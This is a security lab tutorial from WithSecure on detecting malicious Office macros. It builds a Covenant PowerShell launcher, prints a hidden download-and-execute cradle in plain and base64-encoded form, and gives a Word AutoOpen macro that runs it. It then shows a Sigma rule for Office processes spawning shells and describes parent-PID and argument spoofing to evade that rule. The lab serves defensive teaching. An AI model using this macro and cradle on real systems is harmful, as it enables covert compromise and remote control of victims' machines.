{"id":10591,"date":"2020-06-24T09:00:00","date_gmt":"2020-06-24T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/"},"modified":"2026-05-25T10:34:39","modified_gmt":"2026-05-25T09:34:39","slug":"attack-detection-fundamentals-initial-access-lab-1","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/","title":{"rendered":"Attack Detection Fundamentals: Initial Access &#8211; Lab #1"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: Initial Access &#8211; <span class=\"blue-text\">Lab #1<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span 
class=\"wp-component-content__meta-category\">\n                                        Network Security                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                24 6\u6708, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    \u30b7\u30a7\u30a2\u3059\u308b                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab 
#1&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-1024x683.jpg.webp 1024w, 
https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_dbd04a0894bf6dac9d94cbfbaf2096fe\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n           
 <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                \u30b3\u30f3\u30c6\u30f3\u30c4\u30ca\u30d3\u30b2\u30fc\u30b7\u30e7\u30f3            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    \u30bb\u30af\u30b7\u30e7\u30f3\u3092\u9078\u629e                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile 
wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferrer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/\" target=\"_blank\" rel=\"noreferrer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Workshop series, covering 
Initial Access, we explored a number of offensive techniques for obtaining a foothold within a target environment through the creation and successful delivery of malicious documents (also known as maldocs).<\/p>\n<p>We also explored the detection strategies that can be employed to spot these using our own detection stacks. The following blog provides a step-by-step guide to recreating the demos from that Initial Access workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown.<\/p>\n<p>A recording of the workshop can be found <a href=\"https:\/\/youtu.be\/DDK_hC90kR8\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the first lab of this series, we are going to build and analyse a malicious Excel\/Word macro that uses PowerShell to establish a C2 channel. The aim of this simulation will be to highlight the importance of parent-child process analysis.<\/p>\n<p>Parent-child analysis is a general concept, whereby an analyst seeks anomalies within process creation events. In this case, we are going to craft a basic Excel macro that is used to spawn PowerShell.<\/p>\n<p>The reader will have the opportunity to analyse the traces left within Sysmon logs. We will finish the exercise with a small proof-of-concept of one of the many techniques that can be used to evade this type of detection. Considering that this is the first lab, a more comprehensive walkthrough will be provided that will include part of the analysis.<\/p>\n<p>DISCLAIMER: Setup of the tools and the testing environment might not be covered comprehensively within this lab. We will assume basic familiarity with the Linux\/Windows command line and the ability of the reader to deploy the necessary frameworks. 
For that, it is recommended to follow the suggested references for the official tutorials and walkthrough published by the framework&#x27;s author.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Windows VM<\/li>\n<li>Microsoft Office<\/li>\n<li><a href=\"https:\/\/github.com\/cobbr\/Covenant\" target=\"_blank\" rel=\"noopener\">Covenant<\/a><\/li>\n<\/ul>\n<ul>\n<li>AV + Host Firewall turned OFF<\/li>\n<\/ul>\n<h2>Walkthrough<\/h2>\n<h3>1 &#8211; Listener Setup<\/h3>\n<p>Create a listener with a framework of your choice, we will use Covenant, but any framework that supports PowerShell launchers will work.<\/p>\n<p>On the &quot;Listeners&quot; tab, click &quot;Create&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/63a3e6bb880d8cd79e01651387a6397e3-2-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Configure the &quot;ConnectPort&quot; and &quot;ConnectAddress&quot; parameters with the IP address of your Covenant instance and the port where the implant will connect to:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/5aa25397f236995ff165c39af1b913ef2-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Click on &quot;Create&quot; to start the listener.<\/p>\n<h3>2 &#8211; Payload Generation<\/h3>\n<p>We will use the default PowerShell Covenant implant without any modification. 
AV will need to be turned off as Covenant&#x27;s out-of-the-box signatures are well-known.<\/p>\n<p>Don&#x27;t worry if this doesn&#x27;t sound very realistic; the aim of this lab is just to demonstrate the initial access technique. In a later lab we will also cover common evasion techniques.<\/p>\n<p>Select &quot;Launchers&quot; and then &quot;PowerShell&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/936e0fe4246bc18c6b4665771671b4de3-2-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The default options will be enough for now; click on &quot;Generate&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/216854620549a58de75e18f0ab269388-2-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Below you will see a very long PowerShell command with a base64 string, which is the full Covenant .NET implant. This payload is stageless, meaning that the payload is self-contained and will not need to download any other component to be fully operational. In some cases, this might be desired since the staging process often introduces operational risks that could result in being detected.<\/p>\n<p>However, in this case, we want our payload to be staged. To do so, we can click on &quot;Host&quot; and insert the path where our payload will be hosted:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/5a7f667971116557fb2c9ba1e897118c4-2-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Click on &quot;Host&quot; and go back to the &quot;Generate&quot; tab. 
You should see a new one-liner that makes use of the Invoke-Expression cmdlet (shortened to &quot;iex&quot;) to execute our hosted PowerShell script:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/5ad68b594f6a524899831c38df2c02d6-2-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The payload uses a common PowerShell download-and-execute cradle that will fetch the remote content (using the URL you set before) and interpret it as a PowerShell command. The payload will be something similar to this:<\/p>\n<pre><code class=\"language-bash\">powershell -Sta -Nop -Window Hidden -Command &quot;iex (New-Object Net.WebClient).DownloadString(&#x27;http:\/\/192.168.0.9\/test.ps1&#x27;)&quot;<\/code><\/pre>\n<p>Or in encoded form:<\/p>\n<pre><code class=\"language-bash\">powershell -Sta -Nop -Window Hidden -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgA5AC8AZgBpAGcAYQAnACkA<\/code><\/pre>\n<p>To avoid any problems with escaping quotes, you can also use the encoded launcher. The final stage of our attack will be the creation of a Word document with a malicious VBA macro. 
The macro will execute when the document opens, subsequently triggering the whole staging process we just created. To enable macro editing, open Microsoft Word, right-click on the toolbar at the top of the screen and select &quot;Customize the Ribbon&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/1d17f4044b999f40f8000b89a5093b86-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Check the &quot;Developer&quot; box as follows:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/4d936f03fbcdfe761abef0dc92f32970-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>A &quot;Developer&quot; tab should now be visible within the toolbar. Select &quot;Visual Basic&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/19a95865ad7b9d59febf6e0b32734055-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>This will open the Visual Basic editor where we will place our macro code. 
It is possible to use the following code as a template:<\/p>\n<pre><code class=\"language-bash\">Sub AutoOpen()    \nCall Shell(&quot;powershell -Sta -Nop -Window Hidden -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgA5AC8AZgBpAGcAYQAnACkA&quot;)\nEnd Sub<\/code><\/pre>\n<p>Execute the macro with the green arrow button and you should see a new connection within Covenant.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/cd0c7222f042a593a7cea1acba0fee77-1-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>3 &#8211; Analysis with Sigma<\/h3>\n<p><a href=\"https:\/\/github.com\/Neo23x0\/sigma\/\" target=\"_blank\" rel=\"noopener\">Sigma<\/a> is a framework that enables the creation of vendor-neutral SIEM signatures. It supports multiple backends such as Splunk, ELK, QRadar and native PowerShell. We will use a basic Sigma rule to hunt within the Sysmon event log and find anomalous processes being spawned by an Office process. 
The rule we will use is the following and can be found <a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/master\/rules\/windows\/process_creation\/win_office_shell.yml\" target=\"_blank\" rel=\"noopener\">here<\/a>:<\/p>\n<pre><code class=\"language-bash\">title: Microsoft Office Product Spawning Windows Shell\nid: 438025f9-5856-4663-83f7-52f878a70a50\nstatus: experimental\ndescription: Detects a Windows command line executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio.\nreferences:\n    - https:\/\/www.hybrid-analysis.com\/sample\/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100\n    - https:\/\/mgreen27.github.io\/posts\/2018\/04\/02\/DownloadCradle.html\ntags:\n    - attack.execution\n    - attack.defense_evasion\n    - attack.t1059\n    - attack.t1202\n    - car.2013-02-003\n    - car.2014-04-003\nauthor: Michael Haag, Florian Roth, Markus Neis\ndate: 2018\/04\/06\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage:\n            - &#x27;*\\WINWORD.EXE&#x27;\n            - &#x27;*\\EXCEL.EXE&#x27;\n            - &#x27;*\\POWERPNT.exe&#x27;\n            - &#x27;*\\MSPUB.exe&#x27;\n            - &#x27;*\\VISIO.exe&#x27;\n            - &#x27;*\\OUTLOOK.EXE&#x27;\n        Image:\n            - &#x27;*\\cmd.exe&#x27;\n            - &#x27;*\\powershell.exe&#x27;\n            - &#x27;*\\wscript.exe&#x27;\n            - &#x27;*\\cscript.exe&#x27;\n            - &#x27;*\\sh.exe&#x27;\n            - &#x27;*\\bash.exe&#x27;\n            - &#x27;*\\scrcons.exe&#x27;\n            - &#x27;*\\schtasks.exe&#x27;\n            - &#x27;*\\regsvr32.exe&#x27;\n            - &#x27;*\\hh.exe&#x27;\n            - &#x27;*\\wmic.exe&#x27; # https:\/\/app.any.run\/tasks\/c903e9c8-0350-440c-8688-3881b556b8e0\/\n            - &#x27;*\\mshta.exe&#x27;\n            - &#x27;*\\rundll32.exe&#x27;\n            - &#x27;*\\msiexec.exe&#x27;\n            - 
&#x27;*\\forfiles.exe&#x27;\n            - &#x27;*\\scriptrunner.exe&#x27;\n            - &#x27;*\\mftrace.exe&#x27;\n            - &#x27;*\\AppVLP.exe&#x27;\n            - &#x27;*\\svchost.exe&#x27; # https:\/\/www.vmray.com\/analyses\/2d2fa29185ad\/report\/overview.html\n    condition: selection\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - unknown\nlevel: high<\/code><\/pre>\n<p>In order to use Sigma, clone the GitHub repository and install the required dependencies. Since we don&#x27;t want to deploy a SIEM just to test this rule, we can use the PowerShell backend to generate a cmdlet that will go through the logs manually:<\/p>\n<pre><code class=\"language-bash\">.\/sigmac -t powershell ..\/rules\/windows\/process_creation\/win_office_shell.yml<\/code><\/pre>\n<pre><code class=\"language-kusto\">Get-WinEvent -LogName Microsoft-Windows-Sysmon\/Operational | where {($_.ID -eq &quot;1&quot; -and ($_.message -match &quot;ParentImage.*.*\\\\WINWORD.EXE&quot; -or $_.message -match &quot;ParentImage.*.*\\\\EXCEL.EXE&quot; -or $_.message -match &quot;ParentImage.*.*\\\\POWERPNT.exe&quot; -or $_.message -match &quot;ParentImage.*.*\\\\MSPUB.exe&quot; -or $_.message -match &quot;ParentImage.*.*\\\\VISIO.exe&quot; -or $_.message -match &quot;ParentImage.*.*\\\\OUTLOOK.EXE&quot;) -and ($_.message -match &quot;Image.*.*\\\\cmd.exe&quot; -or $_.message -match &quot;Image.*.*\\\\powershell.exe&quot; -or $_.message -match &quot;Image.*.*\\\\wscript.exe&quot; -or $_.message -match &quot;Image.*.*\\\\cscript.exe&quot; -or $_.message -match &quot;Image.*.*\\\\sh.exe&quot; -or $_.message -match &quot;Image.*.*\\\\bash.exe&quot; -or $_.message -match &quot;Image.*.*\\\\scrcons.exe&quot; -or $_.message -match &quot;Image.*.*\\\\schtasks.exe&quot; -or $_.message -match &quot;Image.*.*\\\\regsvr32.exe&quot; -or $_.message -match &quot;Image.*.*\\\\hh.exe&quot; -or $_.message -match &quot;Image.*.*\\\\wmic.exe&quot; -or $_.message -match 
&quot;Image.*.*\\\\mshta.exe&quot; -or $_.message -match &quot;Image.*.*\\\\rundll32.exe&quot; -or $_.message -match &quot;Image.*.*\\\\msiexec.exe&quot; -or $_.message -match &quot;Image.*.*\\\\forfiles.exe&quot; -or $_.message -match &quot;Image.*.*\\\\scriptrunner.exe&quot; -or $_.message -match &quot;Image.*.*\\\\mftrace.exe&quot; -or $_.message -match &quot;Image.*.*\\\\AppVLP.exe&quot; -or $_.message -match &quot;Image.*.*\\\\svchost.exe&quot;)) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message<\/code><\/pre>\n<p>If we execute the resulting PowerShell command on our compromised system, we should obtain something like this:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/15ef70abed5d58633f50cc8460997b8e3-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>4 &#8211; Parent PID and Command-line Argument Spoofing<\/h3>\n<p>Parent-child analysis is not a silver bullet for detecting macro-based abuses; the PPID Spoofing technique is just one of the many examples with which these detections can be avoided. In a nutshell, PPID Spoofing is a <a href=\"https:\/\/attack.mitre.org\/tactics\/TA0005\/\" target=\"_blank\" rel=\"noopener\">Defence Evasion<\/a> technique that allows the attacker to spawn a new process with a different parent.<\/p>\n<p>In this case, we will use an open-source macro template that implements PPID spoofing to decouple the execution of PowerShell from our Office document. We will use the code from the following <a href=\"https:\/\/github.com\/christophetd\/spoofing-office-macro\" target=\"_blank\" rel=\"noopener\">repository<\/a> as a base. 
Since our installation of Office is 32-bit, we will use macro.vba. The relevant line that needs to be changed is the one that specifies the PowerShell command to execute:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/562bc3e5f96da7c61213f958dd1fd5b10-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Another interesting technique implemented in the VBA code is Command-line Argument Spoofing, which, at a high level, allows us to mask the true command-line arguments of our spawned PowerShell process.<\/p>\n<p>NOTE: More technical details of these two evasion techniques can be found in a great <a href=\"https:\/\/youtu.be\/l8nkXCOYQC4\" target=\"_blank\" rel=\"noopener\">talk<\/a> by Will Burgess.<\/p>\n<p>Execute the new macro code and try launching the Sigma rule search we previously used again. You should only see the first attack we performed. Analyse the Sysmon event logs; you should find an entry similar to the following:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/b448b1cf2d8fb418949aae3bbf8ce4ca4-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Notice the &quot;CommandLine&quot; field in the event &#8211; although it looks harmless, it was our Covenant implant being launched!<\/p>\n<h2>Conclusion<\/h2>\n<p>In this first lab we covered how an attacker could use macro-based payloads to obtain an initial foothold in a targeted environment. Despite the simplicity of the technique shown, real-life actors often rely on similar mechanisms for their initial access strategies. The reader was taken through both the generation of the malicious document and the first steps of the triage process from a host events perspective.<\/p>\n<p>Where applicable, bypasses were provided for the shown detections. 
This was done not to empower attackers, but rather to inform defenders that there is no such thing as an infallible technique and that building a robust detection is a continuous process.<\/p>\n<p>The main takeaways from this first lab are:<\/p>\n<ul>\n<li>The importance of having proper logging in place to monitor process creation events.<\/li>\n<li>Parent-child process analysis, which helps identify anomalous behaviours. Although only the Office example is presented, this general model is applicable to many other scenarios.<\/li>\n<\/ul>\n<p>The next lab of this workshop can be found <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-1\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferrer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>  
class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/reverse-engineering-a-lumma-infection\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n           
     <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/machine-learning-driven-malware-analysis\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use 
